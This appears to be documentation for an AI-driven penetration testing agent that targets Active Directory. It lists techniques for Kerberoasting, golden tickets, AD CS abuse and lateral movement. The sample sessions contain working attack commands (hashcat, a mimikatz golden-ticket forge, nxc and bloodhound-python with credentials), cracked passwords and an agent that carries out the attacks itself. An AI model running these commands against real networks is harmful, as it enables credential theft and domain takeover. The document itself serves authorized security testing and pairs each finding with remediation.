Internal Network Agent
The Internal Network agent is a specialized security testing agent equipped with comprehensive knowledge of Active Directory security, Kerberos protocol attacks, and network penetration testing methodologies.
Overview
The Internal Network agent combines deep Active Directory security knowledge with automated tooling to perform thorough network penetration testing. It’s pre-loaded with specialized skills for AD enumeration, Kerberos attacks, and lateral movement techniques.
Agent Configuration
| Property | Value |
|---|---|
| Agent ID | internal-network |
| Color | Purple |
| Pre-loaded Skills | ad-security, kerberos-attacks, network-pentest, privilege-escalation |
| Allowed Tools | Bash, Read, Glob, Grep, WebFetch, WebSearch, Memory |
Launch the Agent
# Start Cyberstrike with internal network agentcyberstrike --agent internal-network
# Or switch during session/agent internal-networkKnowledge Base
The Internal Network agent has access to extensive security knowledge through the skills system.
Active Directory Security Skill
The agent is pre-loaded with comprehensive AD security knowledge including:
- Domain enumeration techniques
- Trust relationship mapping
- Group Policy analysis
- ACL abuse vectors
- Delegation configuration review
- Certificate Services (AD CS) attacks
Kerberos Attacks Skill
Complete Kerberos attack methodology including:
- Kerberoasting (Service ticket extraction)
- AS-REP Roasting (Pre-auth disabled accounts)
- Golden Ticket attacks
- Silver Ticket attacks
- Diamond Ticket attacks
- S4U abuse techniques
- Constrained delegation exploitation
- Resource-based constrained delegation (RBCD)
Network Pentest Skill
Comprehensive network penetration testing knowledge:
- Host discovery and enumeration
- Service identification
- Vulnerability scanning
- Exploitation techniques
- Post-exploitation
- Pivoting and tunneling
Active Directory Attack Vectors
The agent systematically tests AD attack vectors organized by category:
Credential Access (14 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-CRED-01 | LLMNR/NBT-NS Poisoning |
| AD-CRED-02 | Kerberoasting |
| AD-CRED-03 | AS-REP Roasting |
| AD-CRED-04 | Password Spraying |
| AD-CRED-05 | DCSync Attack |
| AD-CRED-06 | NTDS.dit Extraction |
| AD-CRED-07 | LSASS Memory Dumping |
| AD-CRED-08 | SAM Database Extraction |
| AD-CRED-09 | Cached Credentials Extraction |
| AD-CRED-10 | DPAPI Secrets Decryption |
| AD-CRED-11 | Group Policy Preferences |
| AD-CRED-12 | Kerberos Unconstrained Delegation |
| AD-CRED-13 | Shadow Credentials |
| AD-CRED-14 | Machine Account Quota Abuse |
Danger
Credential extraction techniques require explicit authorization. These attacks can trigger security alerts and may violate laws if performed without permission.
Privilege Escalation (12 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-PRIV-01 | ACL Abuse (GenericAll, WriteDACL) |
| AD-PRIV-02 | Group Membership Abuse |
| AD-PRIV-03 | GPO Abuse |
| AD-PRIV-04 | AD CS ESC1-8 Attacks |
| AD-PRIV-05 | Constrained Delegation Abuse |
| AD-PRIV-06 | Resource-Based Constrained Delegation |
| AD-PRIV-07 | SeImpersonate/SeAssignPrimaryToken |
| AD-PRIV-08 | DNSAdmin Abuse |
| AD-PRIV-09 | Exchange Abuse |
| AD-PRIV-10 | SCCM/MECM Abuse |
| AD-PRIV-11 | LAPS Password Retrieval |
| AD-PRIV-12 | gMSA Password Retrieval |
Lateral Movement (10 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-LAT-01 | Pass-the-Hash (PtH) |
| AD-LAT-02 | Pass-the-Ticket (PtT) |
| AD-LAT-03 | Overpass-the-Hash |
| AD-LAT-04 | PSExec/SMBExec |
| AD-LAT-05 | WMI Execution |
| AD-LAT-06 | WinRM/PowerShell Remoting |
| AD-LAT-07 | DCOM Execution |
| AD-LAT-08 | RDP Hijacking |
| AD-LAT-09 | SSH Pivoting |
| AD-LAT-10 | SOCKS Proxy Tunneling |
Persistence (8 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-PERS-01 | Golden Ticket |
| AD-PERS-02 | Silver Ticket |
| AD-PERS-03 | Diamond Ticket |
| AD-PERS-04 | Skeleton Key |
| AD-PERS-05 | AdminSDHolder Modification |
| AD-PERS-06 | SID History Injection |
| AD-PERS-07 | DSRM Account Abuse |
| AD-PERS-08 | DCShadow Attack |
AD CS (Certificate Services) Attack Coverage
The agent includes complete coverage of AD CS attacks (ESC1-ESC11):
| Attack ID | Attack Name | Description |
|---|---|---|
| ESC1 | Misconfigured Certificate Templates | ENROLLEE_SUPPLIES_SUBJECT enabled |
| ESC2 | Misconfigured Certificate Templates | Any Purpose EKU or no EKU |
| ESC3 | Misconfigured Enrollment Agent Templates | Enrollment agent + vulnerable template |
| ESC4 | Vulnerable Certificate Template ACL | Attacker can modify template |
| ESC5 | Vulnerable PKI AD Object ACL | Attacker can modify CA config |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 | CA configured with SAN flag |
| ESC7 | Vulnerable CA ACL | ManageCA or ManageCertificates |
| ESC8 | NTLM Relay to AD CS HTTP Endpoints | Web enrollment without EPA |
| ESC9 | No Security Extension | CT_FLAG_NO_SECURITY_EXTENSION |
| ESC10 | Weak Certificate Mappings | Certificate mapping issues |
| ESC11 | NTLM Relay to ICPR | RPC certificate enrollment |
Tip
Use Certipy or Certify to enumerate AD CS misconfigurations before exploitation.
Kerberos Attack Methodology
Kerberoasting
> Perform Kerberoasting attack against the domain
[Enumerating SPNs...]Found 23 service accounts with SPNs
[Requesting service tickets...][email protected] - AES256-CTS-HMAC-SHA1-96[email protected] - RC4-HMAC[email protected] - AES256-CTS-HMAC-SHA1-96
[Cracking tickets with hashcat...]hashcat -m 13100 hashes.txt wordlist.txt
FINDING: Kerberoastable Service Account━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-CRED-02Account: [email protected]SPN: MSSQLSvc/sql01.corp.local:1433Encryption: RC4-HMAC (weak)Severity: High (CVSS 7.5)Evidence: Password cracked in 2 minutesCWE: CWE-521
Remediation:- Use AES256 encryption for service accounts- Use long, complex passwords (25+ chars)- Consider Group Managed Service Accounts (gMSA)AS-REP Roasting
> Find and exploit accounts with pre-auth disabled
[Querying LDAP for DONT_REQUIRE_PREAUTH...]Found 5 accounts with pre-authentication disabled
[Requesting AS-REP tickets...][email protected] - Ticket obtained[email protected] - Ticket obtained
FINDING: AS-REP Roastable Account━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-CRED-03Account: [email protected]User Account Control: DONT_REQUIRE_PREAUTHSeverity: High (CVSS 7.5)Evidence: AS-REP hash extractable without authCWE: CWE-287
Remediation:- Enable Kerberos pre-authentication- Audit accounts with this flag disabledGolden Ticket Attack
> Demonstrate Golden Ticket persistence
[Prerequisites...]✓ Domain SID: S-1-5-21-3623811015-3361044348-30300820✓ krbtgt NTLM hash: aad3b435b51404eeaad3b435b51404ee:8846f7...
[Forging Golden Ticket...]mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-3623811015-3361044348-30300820 /krbtgt:8846f7... /ptt
FINDING: Golden Ticket Attack Possible━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-PERS-01Impact: Complete domain compromisePersistence: 10 years (default ticket lifetime)Severity: Critical (CVSS 10.0)Evidence: Forged TGT accepted by KDCCWE: CWE-287
Remediation:- Reset krbtgt password twice- Implement Credential Guard- Monitor for TGT anomaliesTesting Methodology
The agent follows a structured approach:
┌─────────────────────────────────────────────────────────────┐│ TESTING METHODOLOGY │├─────────────────────────────────────────────────────────────┤│ 1. RECONNAISSANCE ││ └── Network scanning, domain enumeration ││ ││ 2. ENUMERATION ││ └── Users, groups, ACLs, trusts, policies ││ ││ 3. VULNERABILITY IDENTIFICATION ││ └── Misconfigurations, weak permissions, CVEs ││ ││ 4. EXPLOITATION ││ └── Credential access, privilege escalation ││ ││ 5. LATERAL MOVEMENT ││ └── Pivoting, persistence, domain dominance ││ ││ 6. REPORTING ││ └── Attack paths, findings, remediation │└─────────────────────────────────────────────────────────────┘Integrated Security Tools
The agent leverages industry-standard penetration testing tools:
| Tool | Purpose |
|---|---|
| BloodHound | Attack path visualization and analysis |
| NetExec (nxc) | Network service enumeration and exploitation |
| Impacket | Python AD attack toolkit |
| Certipy | AD CS enumeration and exploitation |
| Rubeus | Kerberos attack toolkit |
| Mimikatz | Credential extraction and manipulation |
| Responder | LLMNR/NBT-NS poisoning |
Tool Integration Example
> Run BloodHound collection against the domain
[Executing BloodHound collector...]bloodhound-python -c All -d corp.local -u jsmith -p 'Password123' -ns 10.0.0.1
[Collection complete]Users: 2,847Computers: 156Groups: 423GPOs: 89OUs: 34Domains: 1Trusts: 2
[Analyzing attack paths...]Shortest path to Domain Admin: 3 hops
Path: [email protected] → MemberOf → IT-Support → GenericAll → [email protected] → AdminTo → DC01.corp.localNetExec (CrackMapExec Successor) Example
> Enumerate SMB shares across the network
[Executing NetExec...]nxc smb 10.0.0.0/24 -u jsmith -p 'Password123' --shares
[Results]10.0.0.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:corp.local)10.0.0.10 445 DC01 [+] corp.local\jsmith:Password12310.0.0.10 445 DC01 SYSVOL READ10.0.0.10 445 DC01 NETLOGON READ10.0.0.10 445 DC01 IT-Share READ,WRITE10.0.0.10 445 DC01 HR-Data NO ACCESS
FINDING: Sensitive Share Access━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Host: DC01 (10.0.0.10)Share: IT-ShareAccess: READ,WRITEUser: jsmith (non-privileged)Severity: Medium (CVSS 5.3)Evidence: Standard user has write access to IT shareCWE: CWE-732
Remediation:- Review share permissions- Implement least privilege- Enable share auditingCVSS Severity Rating
The agent rates findings using CVSS 3.1:
| Severity | CVSS Score | Example Findings |
|---|---|---|
| Critical | 9.0 - 10.0 | DCSync possible, Golden Ticket, AD CS ESC1 |
| High | 7.0 - 8.9 | Kerberoasting (weak), GenericAll on DA |
| Medium | 4.0 - 6.9 | Password spraying, SMB share access |
| Low | 0.1 - 3.9 | Information disclosure, null sessions |
Session Example
You: Perform Active Directory security assessment against corp.local
Agent: I'll perform a comprehensive AD security assessment following structured methodology.
## Phase 1: Domain Enumeration
[Connecting to domain controller...]Domain: corp.localDomain Controller: DC01.corp.local (10.0.0.10)Forest Functional Level: Windows Server 2016
[Enumerating domain objects...]Users: 2,847Computers: 156Groups: 423Trust Relationships: 2 (bidirectional to partner.local)
## Phase 2: Credential Access Testing
[Testing AD-CRED-02: Kerberoasting...]⚠ FINDING - 8 accounts with crackable service tickets
FINDING: Kerberoastable Service Accounts━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-CRED-02Affected Accounts: - svc_sql (RC4, Password: Summer2023!) - svc_backup (RC4, cracking in progress) - svc_iis (AES256, strong password)Severity: High (CVSS 7.5)CWE: CWE-521
## Phase 3: Privilege Escalation Analysis
[Testing AD-PRIV-01: ACL Abuse...]⚠ FINDING - Attack path to Domain Admin identified
FINDING: ACL Abuse Path to Domain Admin━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-PRIV-01Start: [email protected]Path: 1. jsmith → MemberOf → Help Desk 2. Help Desk → GenericAll → IT-Admins group 3. IT-Admins → WriteDACL → Domain AdminsSeverity: Critical (CVSS 9.8)Evidence: BloodHound path verifiedCWE: CWE-269
[Testing AD-PRIV-04: AD CS Attacks...]⚠ FINDING - ESC1 vulnerable template found
FINDING: AD CS ESC1 - Vulnerable Certificate Template━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Technique: AD-PRIV-04Template: UserAuthenticationIssue: ENROLLEE_SUPPLIES_SUBJECT enabledEnrollment: Domain Users can enrollSeverity: Critical (CVSS 9.8)Evidence: Can request cert as Domain AdminCWE: CWE-295
Remediation:- Disable ENROLLEE_SUPPLIES_SUBJECT- Require CA certificate manager approval- Audit certificate template permissions
[Continuing with remaining assessment phases...]Attack Path Visualization
The agent generates attack path diagrams:
┌─────────────────────────────────────────────────────────────┐│ ATTACK PATH ANALYSIS │├─────────────────────────────────────────────────────────────┤│ ││ [Initial Access] ││ │ ││ ▼ ││ ┌─────────┐ Kerberoast ┌─────────────┐ ││ │ jsmith │ ───────────────► │ svc_sql │ ││ └─────────┘ └──────┬──────┘ ││ │ ││ LocalAdmin ││ │ ││ ▼ ││ ┌─────────────┐ ││ │ SQL01 │ ││ └──────┬──────┘ ││ │ ││ DCSync (mimikatz) ││ │ ││ ▼ ││ ┌─────────────┐ ││ │ DC01 │ ││ │ (Domain │ ││ │ Admin) │ ││ └─────────────┘ ││ ││ Hops: 3 | Likelihood: HIGH | Impact: CRITICAL │└─────────────────────────────────────────────────────────────┘Best Practices
- Rules of Engagement - Document scope, timing, and allowed techniques
- Communication - Maintain contact with client during testing
- Evidence Collection - Screenshot and log all findings
- Clean Up - Remove tools, tickets, and artifacts after testing
- Safe Testing - Avoid production system disruption
Caution
Network penetration testing requires explicit written authorization. Unauthorized testing is illegal and can cause significant damage to production systems.
Related Documentation
- Bash Tool - Running network commands
- MCP Kali - Kali Linux tool integration
- Memory Tool - Storing enumeration data
- Report Generator - Creating pentest reports